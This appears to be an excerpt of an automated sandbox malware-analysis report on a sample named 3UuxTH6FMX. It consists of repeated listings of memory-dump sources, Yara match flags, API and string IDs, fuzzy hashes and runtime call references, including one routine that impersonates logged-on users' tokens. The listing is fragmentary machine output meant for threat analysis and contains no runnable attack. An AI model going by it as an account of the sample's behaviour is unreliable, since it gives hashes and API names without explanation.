                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Negative width.$Number is too big.
                                                                                                                                                                  • API String ID: 3237623162-1861685508
                                                                                                                                                                  • Opcode ID: ab522acd4c4287a77fe2f3903c82615eb3740f229d610c7ff32e5c8d09b42faf
                                                                                                                                                                  • Instruction ID: 551cb3159bbe6a1f4dcf43e3559004b9a7173bd754d754217bc9faae986b2863
                                                                                                                                                                  • Opcode Fuzzy Hash: ab522acd4c4287a77fe2f3903c82615eb3740f229d610c7ff32e5c8d09b42faf
                                                                                                                                                                  • Instruction Fuzzy Hash: 4411603290E147DFF216BB78E54A5ADBE709F41704FB50EB9D7A8028A3DE1D70528711
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Negative width.$Number is too big.
                                                                                                                                                                  • API String ID: 3237623162-1861685508
                                                                                                                                                                  • Opcode ID: 63d12b850ce4f7623b80e1b60c009f5eeb9bfdff3b4fb586ff0ffa458465622f
                                                                                                                                                                  • Instruction ID: c984bad04a972c630c7482739a1396e8e9b66145322bc256cccf41e86164cfe2
                                                                                                                                                                  • Opcode Fuzzy Hash: 63d12b850ce4f7623b80e1b60c009f5eeb9bfdff3b4fb586ff0ffa458465622f
                                                                                                                                                                  • Instruction Fuzzy Hash: 53114F3250E187DFF206FB78E41A5ADBF709F41604BB24DB9DB98428A3DE1D70928751
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: db481cee700add6652efbd16517b6fad29b9a19914f0d4d044d41ba2919793f2
                                                                                                                                                                  • Instruction ID: 9ff8fcc60c2d45ad09d7340b9bdc2d093af1b1fd6dd1ea3b7287a4d4793aeb02
                                                                                                                                                                  • Opcode Fuzzy Hash: db481cee700add6652efbd16517b6fad29b9a19914f0d4d044d41ba2919793f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 01F0623130875082FB108F24E4DC7EE5360EBA9769F941615CAAAC66E4CF2CCAD9C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                  • Opcode ID: 5459f65f4676636fdc901623b58b7eba5cdeda63d87ce883b5aed9902fe8fe9f
                                                                                                                                                                  • Instruction ID: 808f3dbc3b0a430e5688edb40fbbf0a1d4410f48ec77d586881a8630ae051145
                                                                                                                                                                  • Opcode Fuzzy Hash: 5459f65f4676636fdc901623b58b7eba5cdeda63d87ce883b5aed9902fe8fe9f
                                                                                                                                                                  • Instruction Fuzzy Hash: 5481063650CA9486F3728F34A4D83EE63A1EB7539CF144B01AE66A65E5DF34CF918E00
                                                                                                                                                                  APIs
                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00000218BFBDF8AF,?,?,00000000,00000218BFBDFB4A,?,?,?,?,-2891666E48DAA7FF,00000218BFBDFAD6), ref: 00000218BFBE845B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000218BFBDF8AF,?,?,00000000,00000218BFBDFB4A,?,?,?,?,-2891666E48DAA7FF,00000218BFBDFAD6), ref: 00000218BFBE847A
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000218BFBDF8AF,?,?,00000000,00000218BFBDFB4A,?,?,?,?,-2891666E48DAA7FF,00000218BFBDFAD6), ref: 00000218BFBE84A2
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000218BFBDF8AF,?,?,00000000,00000218BFBDFB4A,?,?,?,?,-2891666E48DAA7FF,00000218BFBDFAD6), ref: 00000218BFBE84B3
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000218BFBDF8AF,?,?,00000000,00000218BFBDFB4A,?,?,?,?,-2891666E48DAA7FF,00000218BFBDFAD6), ref: 00000218BFBE84C4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: 6807ba57bb3b06937b050f8d70852554bcff7810743d691f316d628e86d8f360
                                                                                                                                                                  • Instruction ID: e57e6da4488f533153aa5af95ecaef4255e81106327e0e99c746f752e605d5b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 6807ba57bb3b06937b050f8d70852554bcff7810743d691f316d628e86d8f360
                                                                                                                                                                  • Instruction Fuzzy Hash: F611633030D64042FB59932566D93FD63529B643FCF048B25A939D67D6DF28DF468B00
                                                                                                                                                                  APIs
                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF7AA12003F,?,?,00000000,00007FF7AA1202DA,?,?,?,?,?,00007FF7AA120266), ref: 00007FF7AA120C5B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7AA12003F,?,?,00000000,00007FF7AA1202DA,?,?,?,?,?,00007FF7AA120266), ref: 00007FF7AA120C7A
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7AA12003F,?,?,00000000,00007FF7AA1202DA,?,?,?,?,?,00007FF7AA120266), ref: 00007FF7AA120CA2
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7AA12003F,?,?,00000000,00007FF7AA1202DA,?,?,?,?,?,00007FF7AA120266), ref: 00007FF7AA120CB3
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7AA12003F,?,?,00000000,00007FF7AA1202DA,?,?,?,?,?,00007FF7AA120266), ref: 00007FF7AA120CC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: a81210357f2d12b0dbfe06c4392c56b8a615d5a3cfef92a64af55cf6380a756d
                                                                                                                                                                  • Instruction ID: bdec9d54f73e67d67c6ea612517d9aaa194d923669cf56572ebf55851f5532fb
                                                                                                                                                                  • Opcode Fuzzy Hash: a81210357f2d12b0dbfe06c4392c56b8a615d5a3cfef92a64af55cf6380a756d
                                                                                                                                                                  • Instruction Fuzzy Hash: E6119D50B0A642D1FA9A7331F991139E1A15F847F0F8643F4E82D066F6EE2CF81B8320
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: c208534474bee3dbacb877acd3411bee42b0ed125ca7fa5af14e4c9113acc209
                                                                                                                                                                  • Instruction ID: eaa1add41f304ce360d33b7982566a161948b0d7e1fa4c459c4fd40f5ed1c9fd
                                                                                                                                                                  • Opcode Fuzzy Hash: c208534474bee3dbacb877acd3411bee42b0ed125ca7fa5af14e4c9113acc209
                                                                                                                                                                  • Instruction Fuzzy Hash: A5111E7020D60506FB68A33554ED3FD23825B7577CF184F24A939DA2D3EE29DF429A00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: integral cannot be stored in char
                                                                                                                                                                  • API String ID: 4097890229-960316848
                                                                                                                                                                  • Opcode ID: d3fa661c7909c31f2df10136174ae6b23e08351e8602a3bf3b77da77346b9ec4
                                                                                                                                                                  • Instruction ID: 87e93f57a030370f45c3f3b8510c6b625a4d599b6590d13a6e63387c8535b56b
                                                                                                                                                                  • Opcode Fuzzy Hash: d3fa661c7909c31f2df10136174ae6b23e08351e8602a3bf3b77da77346b9ec4
                                                                                                                                                                  • Instruction Fuzzy Hash: F9E1EF22F09B91D9FB51DB68E4403ECB7B1BB45348F914279DE8D13AA9DF38A482C710
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: integral cannot be stored in char
                                                                                                                                                                  • API String ID: 4097890229-960316848
                                                                                                                                                                  • Opcode ID: 73f37ea3a65df646b8d9a74c0d95f76a994af0d7590115819a880ecab22728cb
                                                                                                                                                                  • Instruction ID: 74a4d1b4d4402accf13a1f72268dc6b174e242afc3ecaab86096d0f9ccdb2a4e
                                                                                                                                                                  • Opcode Fuzzy Hash: 73f37ea3a65df646b8d9a74c0d95f76a994af0d7590115819a880ecab22728cb
                                                                                                                                                                  • Instruction Fuzzy Hash: F3E1FF22E09B91D9FB11DBA4E4403ECB7B1BB45348F85427DDA9D17BA9EF389482C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: integral cannot be stored in char
                                                                                                                                                                  • API String ID: 909987262-960316848
                                                                                                                                                                  • Opcode ID: 798eccc9fbd753bed3f49468c2a2aa55f5ebd2e469281c1ab0b60e4ad41c59eb
                                                                                                                                                                  • Instruction ID: 6c31be783bfd38e7b55f3f0d0ed3d75a8aef8f2806aad864fc1031972d5e59e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 798eccc9fbd753bed3f49468c2a2aa55f5ebd2e469281c1ab0b60e4ad41c59eb
                                                                                                                                                                  • Instruction Fuzzy Hash: E0D1DE22E09B81D9FB11DB78E4403FCB7B1BB45348FA14275DA9D17AA9DF389486C350
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$GetcollLocinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1287851536-1405518554
                                                                                                                                                                  • Opcode ID: bee632596d628f6d30632f95a3c6143d465c0bf5a7ccc700b9bdb5d3abed2197
                                                                                                                                                                  • Instruction ID: 8ed0005e152d83d14eed141bc51f9161038d799a98cbb9a69e055819158c3d53
                                                                                                                                                                  • Opcode Fuzzy Hash: bee632596d628f6d30632f95a3c6143d465c0bf5a7ccc700b9bdb5d3abed2197
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B918F32705B808AFF14DFB5D8943DC3362EB6478CF448529DA5D97B9ADE38CA918344
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  • Opcode ID: c93d0c80d14289c47e4e012ab7823fd63e1d2ef69c6c82be7162492af36b69b4
                                                                                                                                                                  • Instruction ID: 494eb8ca220622bf0adb1e96abe41483fa39dd28fcf268fdd87cc91509d7a784
                                                                                                                                                                  • Opcode Fuzzy Hash: c93d0c80d14289c47e4e012ab7823fd63e1d2ef69c6c82be7162492af36b69b4
                                                                                                                                                                  • Instruction Fuzzy Hash: B7817EB2A0C62085FB654F3991F83FD37A0AB31B5CF559405DE06D72A5DF29CA839B01
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                  • API String ID: 3668304517-2658103896
                                                                                                                                                                  • Opcode ID: c23aa86301010fbc63903a689a8f217cc4f8b4650af5b1d90549298ac87a62d0
                                                                                                                                                                  • Instruction ID: 6b068894825a34d0d19f19553cc46cc71c697623f05c066971333db17258224e
                                                                                                                                                                  • Opcode Fuzzy Hash: c23aa86301010fbc63903a689a8f217cc4f8b4650af5b1d90549298ac87a62d0
                                                                                                                                                                  • Instruction Fuzzy Hash: CD61C222F0AA85D8FA02EB69F4013BCB371AB84768F924675DE5D567E9DF389047C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy
                                                                                                                                                                  • String ID: at line $, column
                                                                                                                                                                  • API String ID: 2453523683-191570568
                                                                                                                                                                  • Opcode ID: 4a88d01dc7a91aa210aab958555521cb2f93c79a3063fee867bce04a00eed6de
                                                                                                                                                                  • Instruction ID: 502e34d33234dc89da8039a6b6d3d7cce59e1896697465e20dc563414fa5c8f0
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a88d01dc7a91aa210aab958555521cb2f93c79a3063fee867bce04a00eed6de
                                                                                                                                                                  • Instruction Fuzzy Hash: 0751D77260874081EA10DF2AE5C83DE7761F7A5BD8F508211EBA847BDADF39DA91C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$GetctypeLocinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1612978173-1405518554
                                                                                                                                                                  • Opcode ID: 892321993a6b8f510d49293f97be47cb2852b258aa81509cd5633692957d1b5e
                                                                                                                                                                  • Instruction ID: 0d7a2c21e9284c053a09ac6f867c9bfdd0d55de1be3deceeb9bc3df586a40c5d
                                                                                                                                                                  • Opcode Fuzzy Hash: 892321993a6b8f510d49293f97be47cb2852b258aa81509cd5633692957d1b5e
                                                                                                                                                                  • Instruction Fuzzy Hash: 69517B3270AB408AFB11CF70E4943EC37B5EB6474CF444429DE89A6A9ADF34CA66D344
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open
                                                                                                                                                                  • String ID: ?
                                                                                                                                                                  • API String ID: 71445658-1684325040
                                                                                                                                                                  • Opcode ID: d2e39a7b3a77283be8c37f1e95bdb427cc83583d19a6f60775d9edee1f3af3dd
                                                                                                                                                                  • Instruction ID: b70c26cc393bb50d7d221523f817a031174109a5a61110b8b8fb3f8b13891427
                                                                                                                                                                  • Opcode Fuzzy Hash: d2e39a7b3a77283be8c37f1e95bdb427cc83583d19a6f60775d9edee1f3af3dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 9541C67261C78482EB60CB25F4C439EB760F7A97D8F505215FB9982A99DF3CC694CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                  • String ID: GetTempPath2W$kernel32.dll
                                                                                                                                                                  • API String ID: 1646373207-1846531799
                                                                                                                                                                  • Opcode ID: 54cfff917e61736e637f3daaf4ede8ca0052c6a8694a4254edfc7bf5cdf1c370
                                                                                                                                                                  • Instruction ID: 9fa966e0bb90f011c04960b711b29233ffdec573f0d52f609c49fa8eb56e4545
                                                                                                                                                                  • Opcode Fuzzy Hash: 54cfff917e61736e637f3daaf4ede8ca0052c6a8694a4254edfc7bf5cdf1c370
                                                                                                                                                                  • Instruction Fuzzy Hash: 4BE0ED31708A5582EE049F11F9E85ED6361F799B89F585025D91E87B34DE7CC6C5C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseHandleImpersonateLoggedNextOpenProcessUser$CreateFirstRevertSelfSnapshotTokenToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1562318730-0
                                                                                                                                                                  • Opcode ID: dbf08fb0530270e0a5fafac03dddf9d6734b894968ebc745a755e300d34969bd
                                                                                                                                                                  • Instruction ID: 4efd2534f2a50cb9a1654ae34b8d4914aeedd94b04f7d766e1e6e602e2a102e3
                                                                                                                                                                  • Opcode Fuzzy Hash: dbf08fb0530270e0a5fafac03dddf9d6734b894968ebc745a755e300d34969bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0722C572718B8485FB00DB79D4983DD2761E7A57ACF505601EAAD87AEBDF78C981C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                  • Opcode ID: 523722e26ffa46449d979bd975143a43a29be3ae997596a7a20ff96f8c1017ee
                                                                                                                                                                  • Instruction ID: 00278e6f6769a62909dcb398f6f55870011fe6c5f781d278cca0359ebd835574
                                                                                                                                                                  • Opcode Fuzzy Hash: 523722e26ffa46449d979bd975143a43a29be3ae997596a7a20ff96f8c1017ee
                                                                                                                                                                  • Instruction Fuzzy Hash: BED1DE32B18A84CAE711CF69D8882DC77A9F764B9CF044616DE69D7B99DE34CA06C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                  • Opcode ID: 051a95757f3cd31bcbf302130b81a7499006cb3b8c40f8426fd2f443c90a72fc
                                                                                                                                                                  • Instruction ID: 377fdcf5d04c8d0a1bf47cb08f374341c8fc5db3c7202d4168609976e6cd9cf5
                                                                                                                                                                  • Opcode Fuzzy Hash: 051a95757f3cd31bcbf302130b81a7499006cb3b8c40f8426fd2f443c90a72fc
                                                                                                                                                                  • Instruction Fuzzy Hash: A091FF3271869085FB60DF6594D83ED2BA4F764B8CF548509DE1AA7A95CF38CE86CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
